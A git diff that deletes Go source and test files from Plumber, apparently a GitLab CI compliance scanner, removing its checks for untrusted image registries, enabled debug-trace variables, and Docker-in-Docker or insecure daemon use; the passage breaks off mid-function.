diff --git a/control/controlGitlabImageUntrusted.go b/control/controlGitlabImageUntrusted.go
deleted file mode 100644
index 960f64c..0000000
--- a/control/controlGitlabImageUntrusted.go
+++ /dev/null
@@ -1,257 +0,0 @@
-package control
-
-import (
- "fmt"
- "regexp"
- "strings"
-
- "github.com/getplumber/plumber/collector"
- "github.com/getplumber/plumber/configuration"
- "github.com/getplumber/plumber/gitlab"
- "github.com/sirupsen/logrus"
-)
-
-const ControlTypeGitlabImageAuthorizedSourcesVersion = "0.1.0"
-
-// Constants for image registry and trust status
-const (
- dockerHubDomain = "docker.io"
- unknownRegistry = "unknown"
- authorizedStatus = "authorized"
- unauthorizedStatus = "unauthorized"
-)
-
-// GitlabImageAuthorizedSourcesConf holds the configuration for image source authorization
-type GitlabImageAuthorizedSourcesConf struct {
- // Enabled controls whether this check runs
- Enabled bool `json:"enabled"`
-
- // TrustedUrls is a list of authorized registry URLs/patterns
- TrustedUrls []string `json:"trustedUrls"`
-
- // TrustDockerHubOfficialImages trusts official Docker Hub images (e.g., nginx, alpine)
- TrustDockerHubOfficialImages bool `json:"trustDockerHubOfficialImages"`
-}
-
-// GetConf loads configuration from PlumberConfig
-// If config is nil or the control section is missing, the control is disabled (skipped).
-func (p *GitlabImageAuthorizedSourcesConf) GetConf(plumberConfig *configuration.PlumberConfig) error {
- // Plumber config is required
- if plumberConfig == nil {
- p.Enabled = false
- return nil
- }
-
- // Get control config from PlumberConfig
- imgConfig := plumberConfig.GetContainerImageMustComeFromAuthorizedSourcesConfig()
- if imgConfig == nil {
- // Control not configured - disable it
- l.Debug("containerImageMustComeFromAuthorizedSources control configuration is missing from .plumber.yaml file, skipping")
- p.Enabled = false
- return nil
- }
-
- // Check if enabled field is set
- if imgConfig.Enabled == nil {
- return fmt.Errorf("containerImageMustComeFromAuthorizedSources.enabled field is required in .plumber.yaml config file")
- }
-
- // Apply configuration
- p.Enabled = imgConfig.IsEnabled()
- p.TrustedUrls = imgConfig.TrustedUrls
- if imgConfig.TrustDockerHubOfficialImages != nil {
- p.TrustDockerHubOfficialImages = *imgConfig.TrustDockerHubOfficialImages
- }
-
- l.WithFields(logrus.Fields{
- "enabled": p.Enabled,
- "trustedUrls": p.TrustedUrls,
- "trustDockerHubOfficialImages": p.TrustDockerHubOfficialImages,
- }).Debug("containerImageMustComeFromAuthorizedSources control configuration loaded from .plumber.yaml file")
-
- return nil
-}
-
-// GitlabImageAuthorizedSourcesMetrics holds metrics about image source authorization
-type GitlabImageAuthorizedSourcesMetrics struct {
- Total uint `json:"total"`
- Authorized uint `json:"authorized"`
- Unauthorized uint `json:"unauthorized"`
- CiInvalid uint `json:"ciInvalid"`
- CiMissing uint `json:"ciMissing"`
-}
-
-// GitlabImageAuthorizedSourcesResult holds the result of the image authorized sources control
-type GitlabImageAuthorizedSourcesResult struct {
- Issues []GitlabPipelineImageIssueUnauthorized `json:"issues"`
- Metrics GitlabImageAuthorizedSourcesMetrics `json:"metrics"`
- Compliance float64 `json:"compliance"`
- Version string `json:"version"`
- CiValid bool `json:"ciValid"`
- CiMissing bool `json:"ciMissing"`
- Skipped bool `json:"skipped"` // True if control was disabled
- Error string `json:"error,omitempty"` // Error message if data collection failed
-}
-
-////////////////////
-// Control issues //
-////////////////////
-
-// GitlabPipelineImageIssueUnauthorized represents an issue with an unauthorized image source
-type GitlabPipelineImageIssueUnauthorized struct {
- Code ErrorCode `json:"code"`
- DocURL string `json:"docUrl"`
- Link string `json:"link"`
- Status string `json:"status"`
- Job string `json:"job"`
-}
-
-///////////////////////
-// Control functions //
-///////////////////////
-
-// checkImageAuthorizationStatus checks if an image is from an authorized source
-func checkImageAuthorizationStatus(image *collector.GitlabPipelineImageInfo, trustedUrls []string, trustDockerHubOfficialImages bool) string {
- // Check if Docker Hub options are enabled
- isDockerHubOfficial := false
- if trustDockerHubOfficialImages && image.Registry == dockerHubDomain {
- // Check if it's a Docker Hub official image (no username in path)
- // Official images have a single element path (e.g., docker.io/nginx)
- if !strings.Contains(image.Name, "/") {
- isDockerHubOfficial = true
- }
- }
-
- // If no trusted urls in the conf and Docker Hub options don't apply: image is unauthorized
- if len(trustedUrls) == 0 && !isDockerHubOfficial {
- return unauthorizedStatus
- }
-
- // Check if the image url is authorized
- imageUrl := ""
- if image.Registry == unknownRegistry {
- imageUrl = image.Name
- } else {
- imageUrl = image.Registry + "/" + image.Name
- }
-
- // Include tag in the URL for pattern matching (if tag is present)
- if image.Tag != "" {
- imageUrl = imageUrl + ":" + image.Tag
- }
-
- imageUrlSanitized := strings.Trim(imageUrl, "/")
- if imageUrlSanitized == "" {
- return unauthorizedStatus
- }
-
- l.WithFields(logrus.Fields{
- "imageUrlSanitized": imageUrlSanitized,
- "name": image.Name,
- "tag": image.Tag,
- "registry": image.Registry,
- "link": image.Link,
- }).Debug("Checking authorization status of image")
-
- // Normalize variable notations in both the image URL and the trusted URL patterns
- normalizeVarNotation := func(s string) string {
- re := regexp.MustCompile(`\$\{([a-zA-Z_][a-zA-Z0-9_]*)\}`)
- return re.ReplaceAllString(s, `$$$1`)
- }
- imageUrlNormalized := normalizeVarNotation(imageUrlSanitized)
- trustedNormalized := make([]string, 0, len(trustedUrls))
- for _, p := range trustedUrls {
- trustedNormalized = append(trustedNormalized, normalizeVarNotation(p))
- }
-
- // Check if the image is in the authorized URLs list
- if gitlab.CheckItemMatchToPatterns(imageUrlNormalized, trustedNormalized) {
- return authorizedStatus
- }
-
- // If the image is a Docker Hub official image, mark it as authorized
- if isDockerHubOfficial {
- l.WithField("image", image.Name).Debug("Docker Hub official image considered authorized")
- return authorizedStatus
- }
-
- return unauthorizedStatus
-}
-
-// Run executes the image authorized sources control
-func (p *GitlabImageAuthorizedSourcesConf) Run(pipelineImageData *collector.GitlabPipelineImageData) *GitlabImageAuthorizedSourcesResult {
- l := l.WithFields(logrus.Fields{
- "control": "GitlabImageAuthorizedSources",
- "controlVersion": ControlTypeGitlabImageAuthorizedSourcesVersion,
- })
- l.Info("Start image authorized sources control")
-
- result := &GitlabImageAuthorizedSourcesResult{
- Issues: []GitlabPipelineImageIssueUnauthorized{},
- Metrics: GitlabImageAuthorizedSourcesMetrics{},
- Compliance: 100.0,
- Version: ControlTypeGitlabImageAuthorizedSourcesVersion,
- CiValid: pipelineImageData.CiValid,
- CiMissing: pipelineImageData.CiMissing,
- Skipped: false,
- }
-
- // Check if control is enabled
- if !p.Enabled {
- l.Info("Image authorized sources control is disabled, skipping")
- result.Skipped = true
- return result
- }
-
- // If CI is invalid or missing, return early
- if !pipelineImageData.CiValid || pipelineImageData.CiMissing {
- result.Compliance = 0.0
- if !pipelineImageData.CiValid {
- result.Metrics.CiInvalid = 1
- }
- if pipelineImageData.CiMissing {
- result.Metrics.CiMissing = 1
- }
- return result
- }
-
- // Loop over all images to check authorization status
- for _, image := range pipelineImageData.Images {
- status := checkImageAuthorizationStatus(&image, p.TrustedUrls, p.TrustDockerHubOfficialImages)
-
- // Update metrics
- switch status {
- case authorizedStatus:
- result.Metrics.Authorized++
- case unauthorizedStatus:
- result.Metrics.Unauthorized++
- // Add issue for unauthorized images
- issue := GitlabPipelineImageIssueUnauthorized{
- Code: CodeImageUnauthorizedSource,
- DocURL: CodeImageUnauthorizedSource.DocURL(),
- Link: image.Link,
- Status: status,
- Job: image.Job,
- }
- result.Issues = append(result.Issues, issue)
- }
- }
-
- // Calculate compliance based on issues
- if len(result.Issues) > 0 {
- result.Compliance = 0.0
- l.WithField("issuesCount", len(result.Issues)).Debug("Found unauthorized images, setting compliance to 0")
- }
-
- // Set total metrics
- result.Metrics.Total = uint(len(pipelineImageData.Images))
-
- l.WithFields(logrus.Fields{
- "totalImages": result.Metrics.Total,
- "authorizedCount": result.Metrics.Authorized,
- "unauthorizedCount": result.Metrics.Unauthorized,
- "compliance": result.Compliance,
- }).Info("Image authorized sources control completed")
-
- return result
-}
diff --git a/control/controlGitlabPipelineDebugTrace.go b/control/controlGitlabPipelineDebugTrace.go
deleted file mode 100644
index c229324..0000000
--- a/control/controlGitlabPipelineDebugTrace.go
+++ /dev/null
@@ -1,224 +0,0 @@
-package control
-
-import (
- "fmt"
- "strings"
-
- "github.com/getplumber/plumber/collector"
- "github.com/getplumber/plumber/configuration"
- "github.com/getplumber/plumber/gitlab"
- "github.com/sirupsen/logrus"
-)
-
-const ControlTypeGitlabPipelineDebugTraceVersion = "0.1.0"
-
-//////////////////
-// Control conf //
-//////////////////
-
-// GitlabPipelineDebugTraceConf holds the configuration for debug trace detection
-type GitlabPipelineDebugTraceConf struct {
- // Enabled controls whether this check runs
- Enabled bool `json:"enabled"`
-
- // ForbiddenVariables is a list of CI/CD variable names that must not be set to "true"
- ForbiddenVariables []string `json:"forbiddenVariables"`
-}
-
-// GetConf loads configuration from PlumberConfig
-// If config is nil or the control section is missing, the control is disabled (skipped).
-func (p *GitlabPipelineDebugTraceConf) GetConf(plumberConfig *configuration.PlumberConfig) error {
- if plumberConfig == nil {
- p.Enabled = false
- return nil
- }
-
- debugTraceConfig := plumberConfig.GetPipelineMustNotEnableDebugTraceConfig()
- if debugTraceConfig == nil {
- l.Debug("pipelineMustNotEnableDebugTrace control configuration is missing from .plumber.yaml file, skipping")
- p.Enabled = false
- return nil
- }
-
- if debugTraceConfig.Enabled == nil {
- return fmt.Errorf("pipelineMustNotEnableDebugTrace.enabled field is required in .plumber.yaml config file")
- }
-
- p.Enabled = debugTraceConfig.IsEnabled()
- p.ForbiddenVariables = debugTraceConfig.ForbiddenVariables
-
- l.WithFields(logrus.Fields{
- "enabled": p.Enabled,
- "forbiddenVariables": p.ForbiddenVariables,
- }).Debug("pipelineMustNotEnableDebugTrace control configuration loaded from .plumber.yaml file")
-
- return nil
-}
-
-////////////////////////////
-// Control data & metrics //
-////////////////////////////
-
-// GitlabPipelineDebugTraceMetrics holds metrics about debug trace detection
-type GitlabPipelineDebugTraceMetrics struct {
- TotalVariablesChecked uint `json:"totalVariablesChecked"`
- ForbiddenFound uint `json:"forbiddenFound"`
-}
-
-// GitlabPipelineDebugTraceResult holds the result of the debug trace control
-type GitlabPipelineDebugTraceResult struct {
- Issues []GitlabPipelineDebugTraceIssue `json:"issues"`
- Metrics GitlabPipelineDebugTraceMetrics `json:"metrics"`
- Compliance float64 `json:"compliance"`
- Version string `json:"version"`
- CiValid bool `json:"ciValid"`
- CiMissing bool `json:"ciMissing"`
- Skipped bool `json:"skipped"`
- Error string `json:"error,omitempty"`
-}
-
-////////////////////
-// Control issues //
-////////////////////
-
-// GitlabPipelineDebugTraceIssue represents a forbidden debug variable found in the CI config
-type GitlabPipelineDebugTraceIssue struct {
- Code ErrorCode `json:"code"`
- DocURL string `json:"docUrl"`
- VariableName string `json:"variableName"`
- Value string `json:"value"`
- Location string `json:"location"` // "global" or job name
-}
-
-///////////////////////
-// Control functions //
-///////////////////////
-
-// Run executes the debug trace detection control
-func (p *GitlabPipelineDebugTraceConf) Run(pipelineOriginData *collector.GitlabPipelineOriginData) *GitlabPipelineDebugTraceResult {
- l := l.WithFields(logrus.Fields{
- "control": "GitlabPipelineDebugTrace",
- "controlVersion": ControlTypeGitlabPipelineDebugTraceVersion,
- })
- l.Info("Start debug trace detection control")
-
- result := &GitlabPipelineDebugTraceResult{
- Issues: []GitlabPipelineDebugTraceIssue{},
- Metrics: GitlabPipelineDebugTraceMetrics{},
- Compliance: 100.0,
- Version: ControlTypeGitlabPipelineDebugTraceVersion,
- CiValid: pipelineOriginData.CiValid,
- CiMissing: pipelineOriginData.CiMissing,
- Skipped: false,
- }
-
- if !p.Enabled {
- l.Info("Debug trace detection control is disabled, skipping")
- result.Skipped = true
- return result
- }
-
- if len(p.ForbiddenVariables) == 0 {
- l.Info("No forbidden variables configured, skipping")
- result.Skipped = true
- return result
- }
-
- // Use merged conf to check variables after all includes are resolved
- mergedConf := pipelineOriginData.MergedConf
- if mergedConf == nil {
- l.Warn("Merged CI configuration not available, cannot check variables")
- result.Compliance = 0
- result.Error = "merged CI configuration not available"
- return result
- }
-
- // Build a set of forbidden variable names (case-insensitive)
- forbiddenSet := make(map[string]bool, len(p.ForbiddenVariables))
- for _, v := range p.ForbiddenVariables {
- forbiddenSet[strings.ToUpper(v)] = true
- }
-
- // Check global variables
- globalVars, err := gitlab.ParseGlobalVariables(mergedConf)
- if err != nil {
- l.WithError(err).Warn("Unable to parse global variables")
- } else {
- for key, value := range globalVars {
- result.Metrics.TotalVariablesChecked++
- if forbiddenSet[strings.ToUpper(key)] && isTrueValue(value) {
- result.Issues = append(result.Issues, GitlabPipelineDebugTraceIssue{
- Code: CodeDebugTraceEnabled,
- DocURL: CodeDebugTraceEnabled.DocURL(),
- VariableName: key,
- Value: value,
- Location: "global",
- })
- result.Metrics.ForbiddenFound++
- l.WithFields(logrus.Fields{
- "variable": key,
- "value": value,
- "location": "global",
- }).Debug("Forbidden debug variable found in global variables")
- }
- }
- }
-
- // Check per-job variables
- for jobName, jobContent := range mergedConf.GitlabJobs {
- job, err := gitlab.ParseGitlabCIJob(jobContent)
- if err != nil {
- l.WithError(err).WithField("job", jobName).Debug("Unable to parse job, skipping")
- continue
- }
- if job == nil {
- continue
- }
-
- jobVars, err := gitlab.ParseJobVariables(job)
- if err != nil {
- l.WithError(err).WithField("job", jobName).Debug("Unable to parse job variables, skipping")
- continue
- }
-
- for key, value := range jobVars {
- result.Metrics.TotalVariablesChecked++
- if forbiddenSet[strings.ToUpper(key)] && isTrueValue(value) {
- result.Issues = append(result.Issues, GitlabPipelineDebugTraceIssue{
- Code: CodeDebugTraceEnabled,
- DocURL: CodeDebugTraceEnabled.DocURL(),
- VariableName: key,
- Value: value,
- Location: jobName,
- })
- result.Metrics.ForbiddenFound++
- l.WithFields(logrus.Fields{
- "variable": key,
- "value": value,
- "location": jobName,
- }).Debug("Forbidden debug variable found in job variables")
- }
- }
- }
-
- // Calculate compliance
- if len(result.Issues) > 0 {
- result.Compliance = 0.0
- l.WithField("issuesCount", len(result.Issues)).Info("Forbidden debug variables found, setting compliance to 0")
- }
-
- l.WithFields(logrus.Fields{
- "totalChecked": result.Metrics.TotalVariablesChecked,
- "forbiddenFound": result.Metrics.ForbiddenFound,
- "compliance": result.Compliance,
- }).Info("Debug trace detection control completed")
-
- return result
-}
-
-// isTrueValue checks if a variable value is truthy
-// GitLab considers "true", "1", "yes" as truthy for CI_DEBUG_TRACE
-func isTrueValue(value string) bool {
- v := strings.ToLower(strings.TrimSpace(value))
- return v == "true" || v == "1" || v == "yes"
-}
diff --git a/control/controlGitlabPipelineDebugTrace_test.go b/control/controlGitlabPipelineDebugTrace_test.go
deleted file mode 100644
index ac82c1b..0000000
--- a/control/controlGitlabPipelineDebugTrace_test.go
+++ /dev/null
@@ -1,274 +0,0 @@
-package control
-
-import (
- "testing"
-
- "github.com/getplumber/plumber/collector"
- "github.com/getplumber/plumber/gitlab"
-)
-
-// helper to build a GitlabPipelineOriginData with global variables and optional jobs
-func buildPipelineOriginDataWithVars(globalVars map[string]interface{}, jobs map[string]interface{}) *collector.GitlabPipelineOriginData {
- mergedConf := &gitlab.GitlabCIConf{
- GlobalVariables: globalVars,
- GitlabJobs: jobs,
- }
- return &collector.GitlabPipelineOriginData{
- MergedConf: mergedConf,
- CiValid: true,
- CiMissing: false,
- }
-}
-
-func TestDebugTrace_Disabled(t *testing.T) {
- conf := &GitlabPipelineDebugTraceConf{
- Enabled: false,
- ForbiddenVariables: []string{"CI_DEBUG_TRACE"},
- }
- data := buildPipelineOriginDataWithVars(
- map[string]interface{}{"CI_DEBUG_TRACE": "true"},
- nil,
- )
-
- result := conf.Run(data)
-
- if !result.Skipped {
- t.Fatal("expected control to be skipped when disabled")
- }
- if result.Compliance != 100.0 {
- t.Fatalf("expected compliance 100 when skipped, got %v", result.Compliance)
- }
-}
-
-func TestDebugTrace_NoForbiddenVariablesConfigured(t *testing.T) {
- conf := &GitlabPipelineDebugTraceConf{
- Enabled: true,
- ForbiddenVariables: []string{},
- }
- data := buildPipelineOriginDataWithVars(
- map[string]interface{}{"CI_DEBUG_TRACE": "true"},
- nil,
- )
-
- result := conf.Run(data)
-
- if !result.Skipped {
- t.Fatal("expected control to be skipped when no forbidden variables configured")
- }
-}
-
-func TestDebugTrace_NilMergedConf(t *testing.T) {
- conf := &GitlabPipelineDebugTraceConf{
- Enabled: true,
- ForbiddenVariables: []string{"CI_DEBUG_TRACE"},
- }
- data := &collector.GitlabPipelineOriginData{
- MergedConf: nil,
- CiValid: true,
- CiMissing: false,
- }
-
- result := conf.Run(data)
-
- if result.Skipped {
- t.Fatal("expected control not to be skipped")
- }
- if result.Compliance != 0 {
- t.Fatalf("expected compliance 0 when merged conf unavailable, got %v", result.Compliance)
- }
- if result.Error == "" {
- t.Fatal("expected error message when merged conf unavailable")
- }
-}
-
-func TestDebugTrace_GlobalVarTrue(t *testing.T) {
- conf := &GitlabPipelineDebugTraceConf{
- Enabled: true,
- ForbiddenVariables: []string{"CI_DEBUG_TRACE"},
- }
- data := buildPipelineOriginDataWithVars(
- map[string]interface{}{"CI_DEBUG_TRACE": "true"},
- nil,
- )
-
- result := conf.Run(data)
-
- if result.Skipped {
- t.Fatal("expected control to run")
- }
- if result.Compliance != 0.0 {
- t.Fatalf("expected compliance 0, got %v", result.Compliance)
- }
- if len(result.Issues) != 1 {
- t.Fatalf("expected 1 issue, got %d", len(result.Issues))
- }
- issue := result.Issues[0]
- if issue.VariableName != "CI_DEBUG_TRACE" {
- t.Fatalf("expected variable CI_DEBUG_TRACE, got %s", issue.VariableName)
- }
- if issue.Location != "global" {
- t.Fatalf("expected location 'global', got %s", issue.Location)
- }
- if result.Metrics.ForbiddenFound != 1 {
- t.Fatalf("expected ForbiddenFound 1, got %d", result.Metrics.ForbiddenFound)
- }
-}
-
-func TestDebugTrace_GlobalVarFalse(t *testing.T) {
- conf := &GitlabPipelineDebugTraceConf{
- Enabled: true,
- ForbiddenVariables: []string{"CI_DEBUG_TRACE"},
- }
- data := buildPipelineOriginDataWithVars(
- map[string]interface{}{"CI_DEBUG_TRACE": "false"},
- nil,
- )
-
- result := conf.Run(data)
-
- if result.Compliance != 100.0 {
- t.Fatalf("expected compliance 100 when value is false, got %v", result.Compliance)
- }
- if len(result.Issues) != 0 {
- t.Fatalf("expected no issues, got %d", len(result.Issues))
- }
-}
-
-func TestDebugTrace_JobVarTrue(t *testing.T) {
- conf := &GitlabPipelineDebugTraceConf{
- Enabled: true,
- ForbiddenVariables: []string{"CI_DEBUG_TRACE"},
- }
-
- // Build job content as YAML-like map (how GitlabJobs stores parsed CI jobs)
- jobContent := map[interface{}]interface{}{
- "script": "echo hello",
- "variables": map[interface{}]interface{}{
- "CI_DEBUG_TRACE": "true",
- },
- }
- data := buildPipelineOriginDataWithVars(
- nil,
- map[string]interface{}{"build": jobContent},
- )
-
- result := conf.Run(data)
-
- if result.Compliance != 0.0 {
- t.Fatalf("expected compliance 0, got %v", result.Compliance)
- }
- if len(result.Issues) != 1 {
- t.Fatalf("expected 1 issue, got %d", len(result.Issues))
- }
- if result.Issues[0].Location != "build" {
- t.Fatalf("expected location 'build', got %s", result.Issues[0].Location)
- }
-}
-
-func TestDebugTrace_MultipleVarsGlobalAndJob(t *testing.T) {
- conf := &GitlabPipelineDebugTraceConf{
- Enabled: true,
- ForbiddenVariables: []string{"CI_DEBUG_TRACE", "CI_DEBUG_SERVICES"},
- }
-
- jobContent := map[interface{}]interface{}{
- "script": "echo test",
- "variables": map[interface{}]interface{}{
- "CI_DEBUG_SERVICES": "true",
- },
- }
- data := buildPipelineOriginDataWithVars(
- map[string]interface{}{"CI_DEBUG_TRACE": "true"},
- map[string]interface{}{"test-job": jobContent},
- )
-
- result := conf.Run(data)
-
- if result.Compliance != 0.0 {
- t.Fatalf("expected compliance 0, got %v", result.Compliance)
- }
- if len(result.Issues) != 2 {
- t.Fatalf("expected 2 issues, got %d", len(result.Issues))
- }
- if result.Metrics.ForbiddenFound != 2 {
- t.Fatalf("expected ForbiddenFound 2, got %d", result.Metrics.ForbiddenFound)
- }
-}
-
-func TestDebugTrace_CaseInsensitiveVariableMatch(t *testing.T) {
- conf := &GitlabPipelineDebugTraceConf{
- Enabled: true,
- ForbiddenVariables: []string{"ci_debug_trace"},
- }
- data := buildPipelineOriginDataWithVars(
- map[string]interface{}{"CI_DEBUG_TRACE": "true"},
- nil,
- )
-
- result := conf.Run(data)
-
- if len(result.Issues) != 1 {
- t.Fatalf("expected case-insensitive match to find 1 issue, got %d", len(result.Issues))
- }
-}
-
-func TestDebugTrace_NoIssuesCleanConfig(t *testing.T) {
- conf := &GitlabPipelineDebugTraceConf{
- Enabled: true,
- ForbiddenVariables: []string{"CI_DEBUG_TRACE", "CI_DEBUG_SERVICES"},
- }
-
- jobContent := map[interface{}]interface{}{
- "script": "echo hello",
- "variables": map[interface{}]interface{}{
- "MY_VAR": "hello",
- },
- }
- data := buildPipelineOriginDataWithVars(
- map[string]interface{}{"SOME_VAR": "value"},
- map[string]interface{}{"build": jobContent},
- )
-
- result := conf.Run(data)
-
- if result.Compliance != 100.0 {
- t.Fatalf("expected compliance 100, got %v", result.Compliance)
- }
- if len(result.Issues) != 0 {
- t.Fatalf("expected no issues, got %d", len(result.Issues))
- }
- if result.Metrics.TotalVariablesChecked < 2 {
- t.Fatalf("expected at least 2 variables checked, got %d", result.Metrics.TotalVariablesChecked)
- }
-}
-
-func TestIsTrueValue(t *testing.T) {
- tests := []struct {
- input string
- want bool
- }{
- {"true", true},
- {"TRUE", true},
- {"True", true},
- {" true ", true},
- {"1", true},
- {"yes", true},
- {"YES", true},
- {"Yes", true},
- {"false", false},
- {"0", false},
- {"no", false},
- {"", false},
- {"random", false},
- {"truthy", false},
- }
-
- for _, tt := range tests {
- t.Run(tt.input, func(t *testing.T) {
- got := isTrueValue(tt.input)
- if got != tt.want {
- t.Fatalf("isTrueValue(%q) = %v, want %v", tt.input, got, tt.want)
- }
- })
- }
-}
diff --git a/control/controlGitlabPipelineDockerInDocker.go b/control/controlGitlabPipelineDockerInDocker.go
deleted file mode 100644
index fed3389..0000000
--- a/control/controlGitlabPipelineDockerInDocker.go
+++ /dev/null
@@ -1,310 +0,0 @@
-package control
-
-import (
- "fmt"
- "strings"
-
- "github.com/getplumber/plumber/collector"
- "github.com/getplumber/plumber/configuration"
- "github.com/getplumber/plumber/gitlab"
- "github.com/sirupsen/logrus"
- "gopkg.in/yaml.v2"
-)
-
-const ControlTypeGitlabPipelineDockerInDockerVersion = "0.1.0"
-
-//////////////////
-// Control conf //
-//////////////////
-
-// GitlabPipelineDockerInDockerConf holds the configuration for Docker-in-Docker detection
-type GitlabPipelineDockerInDockerConf struct {
- Enabled bool `json:"enabled"`
- DetectInsecureDaemon bool `json:"detectInsecureDaemon"`
-}
-
-// GetConf loads configuration from PlumberConfig.
-// If config is nil or the control section is missing, the control is disabled (skipped).
-func (p *GitlabPipelineDockerInDockerConf) GetConf(plumberConfig *configuration.PlumberConfig) error {
- if plumberConfig == nil {
- p.Enabled = false
- return nil
- }
-
- cfg := plumberConfig.GetPipelineMustNotUseDockerInDockerConfig()
- if cfg == nil {
- l.Debug("pipelineMustNotUseDockerInDocker control configuration is missing from .plumber.yaml file, skipping")
- p.Enabled = false
- return nil
- }
-
- if cfg.Enabled == nil {
- return fmt.Errorf("pipelineMustNotUseDockerInDocker.enabled field is required in .plumber.yaml config file")
- }
-
- p.Enabled = cfg.IsEnabled()
- p.DetectInsecureDaemon = cfg.IsDetectInsecureDaemonEnabled()
-
- l.WithFields(logrus.Fields{
- "enabled": p.Enabled,
- "detectInsecureDaemon": p.DetectInsecureDaemon,
- }).Debug("pipelineMustNotUseDockerInDocker control configuration loaded from .plumber.yaml file")
-
- return nil
-}
-
-////////////////////////////
-// Control data & metrics //
-////////////////////////////
-
-// GitlabPipelineDockerInDockerMetrics holds metrics about DinD detection
-type GitlabPipelineDockerInDockerMetrics struct {
- TotalJobsChecked uint `json:"totalJobsChecked"`
- DindServicesFound uint `json:"dindServicesFound"`
- InsecureDaemonFound uint `json:"insecureDaemonFound"`
-}
-
-// GitlabPipelineDockerInDockerResult holds the result of the DinD control
-type GitlabPipelineDockerInDockerResult struct {
- Issues []GitlabPipelineDockerInDockerIssue `json:"issues"`
- Metrics GitlabPipelineDockerInDockerMetrics `json:"metrics"`
- Compliance float64 `json:"compliance"`
- Version string `json:"version"`
- CiValid bool `json:"ciValid"`
- CiMissing bool `json:"ciMissing"`
- Skipped bool `json:"skipped"`
- Error string `json:"error,omitempty"`
-}
-
-////////////////////
-// Control issues //
-////////////////////
-
-// GitlabPipelineDockerInDockerIssue represents a DinD finding in the CI config
-type GitlabPipelineDockerInDockerIssue struct {
- Code ErrorCode `json:"code"`
- DocURL string `json:"docUrl"`
- JobName string `json:"jobName"`
- ServiceImage string `json:"serviceImage,omitempty"`
- Detail string `json:"detail,omitempty"`
-}
-
-///////////////////////
-// Control functions //
-///////////////////////
-
-// isDindImage returns true if the image name refers to a Docker-in-Docker service.
-func isDindImage(image string) bool {
- image = strings.ToLower(strings.TrimSpace(image))
- if image == "" {
- return false
- }
-
- // Strip registry prefix to normalize (e.g. docker.io/docker:dind -> docker:dind)
- parts := strings.Split(image, "/")
- shortName := parts[len(parts)-1]
-
- // Match docker:dind, docker:*-dind, docker:latest
- if !strings.HasPrefix(shortName, "docker:") && shortName != "docker" {
- return false
- }
-
- // docker (no tag) is not necessarily dind
- if shortName == "docker" {
- return false
- }
-
- tag := strings.TrimPrefix(shortName, "docker:")
- if tag == "dind" || tag == "latest" {
- return true
- }
- // Match version-dind patterns like 27.3.1-dind, 27-dind-rootless
- if strings.Contains(tag, "dind") {
- return true
- }
- return false
-}
-
-// parseServiceNames extracts service image names from the Services field of a GitlabJob.
-// GitLab allows services as a list of strings or a list of maps with a "name" key.
-func parseServiceNames(services interface{}) []string {
- if services == nil {
- return nil
- }
-
- switch s := services.(type) {
- case []interface{}:
- var names []string
- for _, item := range s {
- switch entry := item.(type) {
- case string:
- names = append(names, entry)
- case map[interface{}]interface{}:
- // Try to parse as gitlab.Service struct
- svc := gitlab.Service{}
- yamlData, err := yaml.Marshal(entry)
- if err == nil {
- _ = yaml.Unmarshal(yamlData, &svc)
- }
- if svc.Name != "" {
- names = append(names, svc.Name)
- }
- }
- }
- return names
- default:
- return nil
- }
-}
-
-// Run executes the Docker-in-Docker detection control
-func (p *GitlabPipelineDockerInDockerConf) Run(pipelineOriginData *collector.GitlabPipelineOriginData) *GitlabPipelineDockerInDockerResult {
- l := l.WithFields(logrus.Fields{
- "control": "GitlabPipelineDockerInDocker",
- "controlVersion": ControlTypeGitlabPipelineDockerInDockerVersion,
- })
- l.Info("Start Docker-in-Docker detection control")
-
- result := &GitlabPipelineDockerInDockerResult{
- Issues: []GitlabPipelineDockerInDockerIssue{},
- Metrics: GitlabPipelineDockerInDockerMetrics{},
- Compliance: 100.0,
- Version: ControlTypeGitlabPipelineDockerInDockerVersion,
- CiValid: pipelineOriginData.CiValid,
- CiMissing: pipelineOriginData.CiMissing,
- Skipped: false,
- }
-
- if !p.Enabled {
- l.Info("Docker-in-Docker detection control is disabled, skipping")
- result.Skipped = true
- return result
- }
-
- mergedConf := pipelineOriginData.MergedConf
- if mergedConf == nil {
- l.Warn("Merged CI configuration not available, cannot check services")
- result.Compliance = 0
- result.Error = "merged CI configuration not available"
- return result
- }
-
- for jobName, jobContent := range mergedConf.GitlabJobs {
- job, err := gitlab.ParseGitlabCIJob(jobContent)
- if err != nil {
- l.WithError(err).WithField("job", jobName).Debug("Unable to parse job, skipping")
- continue
- }
- if job == nil {
- continue
- }
-
- result.Metrics.TotalJobsChecked++
-
- serviceNames := parseServiceNames(job.Services)
- hasDind := false
- var dindImage string
-
- for _, svc := range serviceNames {
- if isDindImage(svc) {
- hasDind = true
- dindImage = svc
- break
- }
- }
-
- if !hasDind {
- continue
- }
-
- // DinD service found: emit ISSUE-412
- result.Issues = append(result.Issues, GitlabPipelineDockerInDockerIssue{
- Code: CodeDockerInDockerUsage,
- DocURL: CodeDockerInDockerUsage.DocURL(),
- JobName: jobName,
- ServiceImage: dindImage,
- })
- result.Metrics.DindServicesFound++
-
- l.WithFields(logrus.Fields{
- "job": jobName,
- "service": dindImage,
- }).Debug("Docker-in-Docker service found")
-
- // If detectInsecureDaemon is enabled, check for insecure config in the same job
- if p.DetectInsecureDaemon {
- if detail := detectInsecureDaemon(job, mergedConf); detail != "" {
- result.Issues = append(result.Issues, GitlabPipelineDockerInDockerIssue{
- Code: CodeDockerInDockerInsecure,
- DocURL: CodeDockerInDockerInsecure.DocURL(),
- JobName: jobName,
- Detail: detail,
- })
- result.Metrics.InsecureDaemonFound++
-
- l.WithFields(logrus.Fields{
- "job": jobName,
- "detail": detail,
- }).Debug("Insecure Docker daemon configuration found")
- }
- }
- }
-
- if len(result.Issues) > 0 {
- result.Compliance = 0.0
- l.WithField("issuesCount", len(result.Issues)).Info("Docker-in-Docker issues found, setting compliance to 0")
- }
-
- l.WithFields(logrus.Fields{
- "totalJobsChecked": result.Metrics.TotalJobsChecked,
- "dindServicesFound": result.Metrics.DindServicesFound,
- "insecureDaemonFound": result.Metrics.InsecureDaemonFound,
- "compliance": result.Compliance,
- }).Info("Docker-in-Docker detection control completed")
-
- return result
-}
-
-// detectInsecureDaemon checks job-level and global variables for insecure Docker daemon settings.
-// Returns a description of the finding, or empty string if none.
-func detectInsecureDaemon(job *gitlab.GitlabJob, mergedConf *gitlab.GitlabCIConf) string {
- var findings []string
-
- // Check job variables first
- jobVars, err := gitlab.ParseJobVariables(job)
- if err == nil {
- if checkInsecureVars(jobVars) != "" {
- findings = append(findings, checkInsecureVars(jobVars))
- }
- }
-
